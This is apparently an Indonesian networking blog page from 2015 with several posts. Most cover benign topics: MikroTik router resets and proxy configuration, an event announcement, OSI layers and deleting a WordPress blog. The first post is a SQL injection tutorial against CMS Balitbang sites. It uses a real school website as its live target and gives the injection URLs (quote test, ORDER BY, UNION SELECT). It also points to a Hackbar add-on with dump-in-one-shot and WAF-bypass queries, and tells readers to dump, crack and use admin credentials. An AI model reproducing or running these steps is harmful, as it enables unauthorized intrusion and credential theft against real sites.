Selasa, 28 Juli 2015

SQL INJECTION ON CMS BALITBANG

sql injection on cms balitbang
selamat datang dan selamat berkunjung para injector...:D
kali ini sya akan ngasih tutorial injeksi website pada cms balitbang.
seperti yang kita tahu cms balitbang memiliki banyak celah..mulai dari default password hingga registration member dengan inspect element.
tapi kali ini saya tidak akan membahas bug-bug di atas. saya akan fokus gmana masuk ke web berbasis cms balitbang dengan tekhnik sql injection.
ok..lets start..

alat2 yang di butuhkan

-kompi (wajib hukumnya.. :D)
-koneksi internet
-browser disarankan memakai mozilla firefox (karena kita akan menggunakan addons hackbar)
-hackbar. di sini sy memakai hackbar modifan. karena di dalmnya sudah include dios dan query untuk membypass waf. bisa di donlod di sini
 download di sini

otomatis terdownload,kemudian klik allow..kemudian kilk installnow otomatis addons hackbar terinstall di browser anda. "penting di ingat bahwa hackbar di atas sangat berguna untuk kita melakukan injeksi"
-untuk dorknya silahkan berkreasi sendiri..

anggap aja kita udah punya targetnya,. di sini saya gunakan live target http://smkn1-cirebon.sch.id/html/profil.php?id=profil&kode=17&profil=Sarana+&+Prasarana

kita buka browser mozilla kita ..
kita lakukan test pada url dengan menambahkan tanda kutip ( ' )
http://smkn1-cirebon.sch.id/html/profil.php?id=profil&kode=17'&profil=Sarana+&+Prasarana

dan ternyata sebagian file hilang. berrarti bisa di pastikan web vuln sqli.
selanjutnya kita masukkan injeksi kita dengan cara http://smkn1-cirebon.sch.id/html/profil.php?id=profil&kode=17+order+by+1--+&profil=Sarana+&+Prasarana
lakuan secara berutuan hingga ketemu erornya.. ok..ternyata eror ada di kolom  8


selanjutnya kita masukan perintah union select untuk mencari angka injeksinya http://smkn1-cirebon.sch.id/html/profil.php?id=profil&kode=17+and+0+union+select+1,2,3,4,5,6,7,8--+-&profil=Sarana+&+Prasarana
ternyata muncul muncul angka ajaib yaitu 2 dan 3.




selanjutnya di sinilah fungsi hackbar kita tadi yaitu untuk melakukan dios(dump in one shoot)
buka hackbar dengan cara klik tools/show/hide hackbar atau tekan f9

kita blok angka ajaibnya di hackbar yaitu angka 3 kemudia klik UNIOON BASED -DIOS mysql -dios by madblood kemudian klik execute..(lihat gambar)



dannnn...wala...... muncul semua daleman webnya..;D


selanjutnya kita dump isi username dan passwordanya... bingo..... balitbang owned..:D

langkah selajutnya silahkan crack passwordnya dan silahkan login...tapi ingat jangan tebas index.

sekian tutorial cupu dr saya...maaf kalo ada salah2 dalam penulisan maklum masih belajar bikin tutorial kak..

NB: hackbar di atas bisa di gunakan juga untuk dios web lain.. mulai dari eror based hingga dios mssql.. untuk tutorial selanjutnya harap bersabar..makasih udah berkunjung..


Read more

Senin, 27 Juli 2015

Cara Reset Routerboard MikroTik [Hardware]

Penulis Artikel : Ahmad Lukman Hakim
Berikut saya akan menulis artikel tentang cara mereset Routerboard MikroTik. Saya disini menggunakan series RB 700, seperti RB 711, 750, 751, dsb. Ini adalah cara mereset routerboard MikroTik secara HARDWARE. Saya yakin kalau cara mereset routerboard MikroTik secara SOFTWARE itu lebih mudah daripada secara HARDWARE dan caranya tidak sebarang menekan tombol reset saja, tetapi ada prosedur yang harus diperhatikan baik-baik. 

Berikut prosedur cara reset Routerboard MikroTik secara hardware:
1. Pastikan semua kabel UTP tidak ada yang terhubung ke port Ethernet.
2. Pastikan kabel Adaptor atau kabel Power tidak tercolok ke routerboard (harus router dalam keadaan off)
3. Ambil pena (atau alat lain yang kecil-lancip dan tidak mudah patah) yang bisa masuk ke lubang tombol reset routerboard.

4. Tekan tombol reset-nya sampai berbunyi 'tek' dan tahan (jangan dilepas) tetap kondisikan seperti tersebut lalu ambil kabel adaptor (power) dan colokan. Ini dilakukan dengan tetap menekan tombol resetnya
"Jika tombol reset terlepas pada saat proses mencolokan kabel adaptor (power) maka anda harus mengulangi prosedur no.4"
5. Tetap dalam kondisi tersesebut, tunggu sampai anda melihat lampu (LED) ACT menyala, tetap dalam kondisi tersebut sampai lampu ACT mati.
6. Masih dalam kondisi menekan tombol reset, tunggu lampu indikator port Ethernet menyala sebentar kemudian mati. Biasanya membutuhkan waktu 20-40 detik.
7. Setelah semua lampu indikator pada port Ethernet menyala kemudian padam. Lepaskan kabel adaptor (power), sehingga routerboard dalam keadaan off.
8. Colokan kembali kabel adaptor (power) untuk menghidupkan routerboard.
9. Routerboard sudah dalam keadaan default configuration. Anda bisa memulai konfigurasi dari awal.

Semoga dapat bermanfaat bagi pembaca yang belum tahu prosedur yang benar bagaimana itu me-reset routerboard MikroTik.


Read more

Minggu, 26 Juli 2015

Ikuti Mikrotik User Meeting Yogyakarta - Oktober 2015

Mikrotik User Meeting (MUM) akan kembali diselenggarakan di Indonesia. Setelah 2 tahun berturut-turut diselenggarakan di Yogyakarta, tahun 2015 ini juga akan diselenggarakan di tempat yang sama. Ada yang belum tau apa itu Mikrotik User Meeting (MUM)?


Apa itu Mikrotik User Meeting (MUM)?

Mikrotik User Meeting (MUM) adalah Sebuah konferensi dan pertemuan antar penggiat Mikrotik yang membahas tentang Software Mikrotik RouterOS dan, Hardware Mikrotik RouterBoard. Pada konferensi Mikrotik ini terdapat beberapa expert Mikrotik Indonesia dan Mancanegara yang berbagi informasi melalui presentasi tentang Mikrotik. Anda dapat mengajukan pertanyaan tentang topik tersebut. Ada juga Demo penggunaan teknologi terbaru Mikrotik, pengenalan produk baru, semua ada disini.
Selengkapnya tentang MUM bisa anda baca disini :
Apa itu Mikrotik User Meeting (MUM)?

MUM Indonesia tahun ini diselenggarakan di tempat yang sama, yakni di :
Royal Ambarrukmo, Jl. Adi Sucipto No. 81, Yogyakarta 55281

Acara ini akan dilaksanakan pada :
9 - 10 Oktober 2014


Penasaran dengan agenda Acara MUM tahun lalu?
Download Materi & Video MUM Indonesia - Yogyakarta 5-6 Desember 2014

Anda tertarik mengikuti event ini? Silakan daftar disini GRATIS.
mum.mikrotik.com/2015/ID/info



Setelah proses pendaftaran selesai, anda akan diberi tiket dalam bentuk .pdf seperti ini :



Silakan cetak dan potong tiket nya, lalu bawa pada saat hari pelaksanaan.

Oke, sampai jumpa di MUM Indonesia Yogyakarta 9 - 10 Oktober 2015.
Read more

Kamis, 16 Juli 2015

Selamat Hari Raya Idul Fitri 1436 H

Assalamu'alaikum Wr. Wb.
Alhamdulillah, puji syukur kami panjatkan ke hadirat Allah SWT, karena dengan rahmat Nya lah kita semua bisa kembali bertemu hari yang Fitri di tahun 2015 atau 1436 H ini.

Pada hari yang fitri ini, Saya mohon maaf apabila di dalam blog ini ada sesuatu hal yang tidak berkenan di hati pembaca sekalian. Mungkin ada beberapa dari pembaca sekalian yang berkomentar dan mengajukan pertanyaan baik di blog MikrotikIndo ini maupun di Fans Page Facebook namun tidak ada jawaban. Saya mohon maaf yang sebesar-besarnya karena kesibukan dan aktifitas saya sehari-hari yang padat sehingga tidak sempat membalas komentar dan pertanyaan pembaca sekalian satu per satu. Semoga bisa dijadikan maklum.

Saya ucapkan banyak terimakasih karena pembaca sekalian telah bersedia membaca tulisan saya di blog ini. Semoga apa yang saya tuliskan di blog ini dapat memberikan manfaat bagi pembaca sekalian.



Saya Rizky Agung Pratama selaku admin dari blog dan Facebook Fans Page MikrotikIndo mengucapkan Selamat Hari Raya Idul Fitri 1436 H Mohon maaf lahir dan bathin.

Akhir kata, Wassalamu'alaikum Wr. Wb.

Banjarnegara, 1 Syawal 1436 H

Read more

Rabu, 15 Juli 2015

Membuat Proxy Eksternal Mikrotik Menggunakan RouterOS Mikrotik

Assalamualaikum warahmatullahi wabarokatuh.........

Sebelumnya kami dari mikrotikindo.blogspot.com mengucapkan "Minal aidin Wal faidzin" Mohon Maaf Lahir Batin.

jika kami pernah menyinggun atau membuat kesalahan, baik disengaja maupun tidak disengaja mohon di "Maafkan" :)


Semoga  agan’ dan agan wati sehat selalu yh 
Sebelum kami mudik lebaran besok pagi, insya Allah semoga selamat sampai ditujuan :) 

Malam ini saya akan nge-share sedikit pengetahuan kami tentang  bagaimana membuat web proxy eksternal, Sebelumnya kami perna nge-post  cara Menambah Cache Proxy Mikrotik Menggunakan USB Flashdisk 

Tetapi pada postingan kali ini sangat berbeda dimana yang akan menjadi proxy eksternya adalah Menggunakan mikrotik itu sendiri hihiihihiihi



Baiklah langsung saja saya mengganbarkan topologi logikalnya seperti dibawah ini


1.  Melakukan konfigurasi pada router GW mikrotik
Lakukan pada terminal :

Ip ad ad ad=192.168.137.2/24 int=ether1

Ip ad ad ad=10.10.10.1/30 int=ether2

Ip ad ad ad=192.168.0.254/24 int=ether3

Ip dns set all=yes ser=118.98.44.100,118.98.44.10

Ip firewall nat nat add chain=dstnat src-address=192.168.0.0/24 protokol=tcp \
dst-port=80  action=dst-nat to-address=10.10.10.2 to-port=8080

Ip firewall nat add ch=srcnat out-interface=ether1 action=masquerade

Ip route ad gateway=192.168.137.1




2.    Melakukan konfigurasi pada router Web-proxy
Lakukan di terminal

Ip ad ad ad=10.10.10.2/30 int=ether1

Ip dns set all=yes ser=118.98.44.100,118.98.44.10

Ip proxy set enable=yes port=8080 cache-administrator=anshar201@gmail.com cache-on-disk=yes max-cache-size=unlimited

Ip route ad gateway=10.10.10.1






Result :

  • Mengakses mikrotikindo.blogspot.com
  • Keadaan pada router GW

  • Keadaan pada Router Proxy





the end, thanks for reading.
Read more

Jumat, 10 Juli 2015

Cara Jitu Menghapus Blog di Wordpress.com

Penulis Artikel : Ahmad Lukman Hakim
Sebelumnya, kenapa saya ingin menghapus blog saya di Wordpress? Jawab: karena saya ingin memulai menulis lagi dari Awal di platform Blogger. Issue dari guru saya, untuk bisa berbisnis Google Adsense yang mudah kita harus menggunakan platform Google juga, jadi saya hapus blog saya yang di platform Wordpress. Itulah alasan saya.

Tidak usah panjang lebar saya berkata, lebih baik sesuai tujuanya yaitu menulis artikel tentang "Cara menghapus Blog Wordpress". Berikut langkah-langkahnya yang disertai gambar supaya pembaca lebih cepat actions :
1. Sebelumnya, anda harus Login ke Dashbor Wordpress anda.
2. Selanjutnya silahkan pilih menu Tools/Perkakas/Plugin, ketika kita klik maka akan muncul sub-menu dibawahnya, Pilih Remove Site/Hapus Blog.
3. Berikut adalah pertanyaan yang diberikan oleh pihak wordpress. Karena saya ingin menulis/blogging di platform Blogger maka saya pilih "Saya menggunakan platform lain."
Seseorang pasti ada alasanya, kenapa ingin menghapus blognya. Jadi pilih sesuai alasan anda.
4. Kemudian pilih Blogger.
Berbeda jika pada langkah di nomor 3 anda memilih alasan yang lain.
5. Nah, silahkah !!! backup dulu semua isi blog anda. Pilih Ekspor/Export.
6. Kemudian pilih apa yang mau anda ekspor. Karena saya akan mengekspor semua isi maka saya pilih Semua Isi lalu Unduh Berkas Ekspor untuk download file eksporanya.
7. Klik Hapus Sekarang untuk menghapus Blog wordpress anda.
8. Berikan tanda Cheklist - Lihat pada Gambar. Lalu Hapus Sekarang.
9. Anda disuruh untuk Confirmasi Penghapusan. Cek email anda untuk mengkonfirmasi.
10.Nah, Klik link konfirmasinya.
Blog Wordpress Anda telah dihapus.

Semoga bermanfaat,,, #luxsmart





Read more

Kamis, 09 Juli 2015

Modal Awal dan Tips Belajar Router MikroTik

Penulis Artikel : Ahmad Lukman Hakim
 
Saya akan sharing sedikit tentang modal utama bisa router MikroTik. Banyak sekali tutorial-tutorial di blog orang lain yang mungkin membahas tentang modal utama seseorang bisa menguasai router MikroTik. Tetapi tujuan saya menulis artikel ini adalah: 1). Untuk update artikel di blog 2). Untuk berbagi ilmu kepada pembaca yang mungkin penasaran bagaimana cara supaya mahir mengoperasikan router MikroTik 3). Sebagai bahan dokumentasi diri saya sendiri, mungkin suatu saat ada orang bertanya, atau bahkan teman sediri bertanya: 
"Hey kawan... saya mau belajar router MikroTik nih... Apa yang harus aku persiapkan ya, atau modal/ilmu awal yang harus saya kuasai?"
Disitulah, saya akan memberikan jawabanya lewat artikel ini. :D

Begitulah tujuan saya menulis artikel tentang "Modal Awal Belajar Router MikroTik", sekarang saya akan menjelaskan langkah demi langkah yang harus anda kuasai.
Belajar itu harus sabar ya? Walaupun sedikit demi sedikit, yang penting rajin. Nanti akan tahu sendiri, "Yang Penting RAJIN membaca, mencoba, bertanya jika tidak tahu kepada teman atau guru yang lebih mengerti.
Oke! Sekarang saya akan memberikan langkah-langkah secara umum bagaimana caranya supaya kita bisa mahir menggunakan MikroTik.

1. Menguasai Dasar Jaringan
Minimal anda sudah pernah membuat jaringan LAN biasa untuk sharing file, printer, dsb. Anda juga harus mengerti apa itu IP Address (prefix "/", subnetmask, netID, hostID, broadcast, dsb.)

2. Aplikasi Internet
Aplikasi internet disini maksudnya anda mengerti bagaimana menggunakan aplikasi Browser biasanya, seperti: Mozilla Firefox, Google Chrome, IE. Anda mengerti bagaimana menghapus cache, setting Proxy Manual, dll. Untuk aplikasi Download Manager juga membantu anda untuk pengujian konfigurasi Router MikroTik.

3. Pengujian Jaringan
Pengujian jaringan disini masksudnya bisa menggunakan perintah "ping" pada Command Prompt.

4. TCP/IP Fundamental
Inilah tahap yang mungkin sulit daripada tahap sebelumnya. Di tahap TCP/IP Fundamental ini anda paling tidak mengerti Port yang sering digunakan dalam dunia jaringan. Anda juga harus mengerti protokol-protokol yang biasa digunakan dalam jaringan, seperti: ICMP,TCP, dan UDP. Jika anda paham tentang 7 OSI Layer maka anda akan mengerti alur paket data yang dikirim dari Physical Layer sampai bisa dilihat oleh  and user (konsumen).
Belajar OSI Layer : http://luxsmart.blogspot.com/2015/07/pengertian-dan-penjelasan-7-jenis-osi.html

5. Simulasi Menggunakan Aplikasi Simulator
Setelah ke-empat tahap sudah dikuasai. Anda harus mempraktikan melalui aplikasi simulator. Misalnya: GNS3, Cisco Packet Tracer, dll.

Terakhir, hanya perlu mencoba dan terus mencoba, bertanya, sharing dan mengembangkan dengan teman satu tujuan, guru IT, dan orang yang lebih menguasai tentang alat tersebut.

Untuk melanjutkan supaya MikroTik Expert anda bisa belajar serta Sertifikasi MikroTik ditempat Training MikroTik. Anda juga bisa belajar dan sertifikasi kepada Trainer yang sudah mempunyai title Academy Trainer MikroTik. "Tidak menutup kemungkinan anda akan menjadi Academy Trainer atau bahkan bisa jadi Trainer".
Status: MTCNA

Sumber : Buku MikroTik Kung Fu : Kitab I
Read more

Senin, 06 Juli 2015

Pengertian dan Penjelasan 7 Jenis OSI Layer

Pengertian
Open System Interconnection (OSI) merupakan model arsitektur jaringan yang dikembangkan oleh International Organization for Standarization (ISO) bisa juga diartikan "Kerangka logika terstruktur bagaimana proses komunikasi data berinteraksi melalui jaringan.
Lapisan OSI jumlahnya ada 7, yaitu:
Application, Presentation, Session, Transport, Network, Data Link, dan Physical.

Ke tujuh OSI tersebut dibagi lagi menjadi 2 grup, yaitu: Upper Layer dan Lower Layer.
  • Upper Layer menangani bagaimana data dipresentasikan. 
  • Lower Layer yang jadi intisari bagaimana data dialirkan dari fisik (bit), frame, Network, Protocol hingga dipresentasikan oleh Upper Layer.
Grub Upper Layer: Application, Presentation, dan Session.
Grub Lower Layer:  Transport, Network, Data Link, dan Physical.

Nah, kita sebagai Networker rata-rata fokus pada Lower Layer.

Penjelasan 7 OSI Layer:
7 - Application Layer
6 - Presentation Layer
5 - Session Layer
4 - Transport Layer
3 - Network Layer
2 - Data Link Layer
1 - Physical Layer
Read more